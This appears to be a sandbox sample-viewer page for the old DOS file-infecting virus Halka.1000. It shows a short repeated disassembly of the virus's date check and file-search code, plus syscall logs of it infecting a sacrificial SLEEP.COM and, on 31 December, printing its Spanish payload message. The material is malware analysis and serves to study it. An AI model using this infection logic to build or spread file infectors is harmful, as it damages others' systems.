Sample viewer

vx.netlux.org/Virus.DOS.Halka.1000.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:12.150011321Z 42 PC: 13f3c | Get date 0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-17T23:01:12.152935871Z 78 PC: 13f6d | Find first file
2018-12-17T23:01:12.160546163Z 61 PC: 13f89 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:12.167887849Z 63 PC: 13f98 | Read file or device (Read 4 bytes on handle 17)
2018-12-17T23:01:12.175028101Z 66 PC: 13fbd | Move file pointer
2018-12-17T23:01:12.182406507Z 64 PC: 13fca | Write file or device (Write 1 bytes on handle 17)
2018-12-17T23:01:12.185189704Z 64 PC: 13fe8 | Write file or device (Write 2 bytes on handle 17)
2018-12-17T23:01:12.188329364Z 64 PC: 13ff5 | Write file or device (Write 1 bytes on handle 17)
2018-12-17T23:01:12.192593459Z 66 PC: 14002 | Move file pointer
2018-12-17T23:01:12.194288109Z 64 PC: 14028 | Write file or device (Write 1000 bytes on handle 17)
2018-12-17T23:01:12.209766003Z 62 PC: 1402d | Close file
2018-12-17T23:01:12.220744283Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T23:01:12.225040809Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13785,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:58.706965346Z 42 PC: 13f3c | Get date 0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-25T12:38:58.709627645Z 78 PC: 13f6d | Find first file
2018-12-25T12:38:58.716085092Z 61 PC: 13f89 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:58.723455937Z 63 PC: 13f98 | Read file or device (Read 4 bytes on handle 17)
2018-12-25T12:38:58.729997451Z 66 PC: 13fbd | Move file pointer
2018-12-25T12:38:58.739321054Z 64 PC: 13fca | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.741997943Z 64 PC: 13fe8 | Write file or device (Write 2 bytes on handle 17)
2018-12-25T12:38:58.744619385Z 64 PC: 13ff5 | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.747669061Z 66 PC: 14002 | Move file pointer
2018-12-25T12:38:58.749718575Z 64 PC: 14028 | Write file or device (Write 1000 bytes on handle 17)
2018-12-25T12:38:59.639182488Z 62 PC: 1402d | Close file
2018-12-25T12:38:59.808405241Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:38:59.812660778Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":31,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13785,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:58.830460761Z 42 PC: 13f3c | Get date 0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-25T12:38:58.833257252Z 9 PC: 13f4f | Display string (String= ' Este es el virus 786 Version 1 Echo por --> ��x�� [�x�]/A.H.D. HALKA/. Industria Argentina Quemen al mu�eco del `94! ')
2018-12-25T12:38:58.836807993Z 76 PC: 13f54 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13785,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:58.963248591Z 42 PC: 13f3c | Get date 0x13f3c: cmp dh, 0xc
0x13f3f: jne 0x13f54
0x13f41: cmp dl, 0x1f
0x13f44: jne 0x13f54
0x13f46: mov ax, 0x900
0x13f49: lea dx, word ptr [bp + 0x166]
0x13f4d: int 0x21
0x13f4f: mov ax, 0x4c00
0x13f52: int 0x21
0x13f54: cld
0x13f55: mov cx, 4
0x13f58: mov di, 0x100
0x13f5b: lea si, word ptr [bp + 0x15c]
0x13f5f: rep movsb byte ptr es:[di], byte ptr [si]
0x13f61: mov ax, 0x4e00
0x13f64: mov cx, 0
0x13f67: lea dx, word ptr [bp + 0x160]
0x13f6b: int 0x21
0x13f6d: jae 0x13f81
0x13f6f: mov cx, 0x2b
2018-12-25T12:38:58.966025178Z 78 PC: 13f6d | Find first file
2018-12-25T12:38:58.972656919Z 61 PC: 13f89 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:58.980480382Z 63 PC: 13f98 | Read file or device (Read 4 bytes on handle 17)
2018-12-25T12:38:58.987260262Z 66 PC: 13fbd | Move file pointer
2018-12-25T12:38:58.988749108Z 64 PC: 13fca | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.991518598Z 64 PC: 13fe8 | Write file or device (Write 2 bytes on handle 17)
2018-12-25T12:38:58.994228581Z 64 PC: 13ff5 | Write file or device (Write 1 bytes on handle 17)
2018-12-25T12:38:58.997452362Z 66 PC: 14002 | Move file pointer
2018-12-25T12:38:58.998898765Z 64 PC: 14028 | Write file or device (Write 1000 bytes on handle 17)
2018-12-25T12:39:00.124380182Z 62 PC: 1402d | Close file
2018-12-25T12:39:00.169553219Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:39:00.172624519Z 0 PC: 12a89 | Program terminate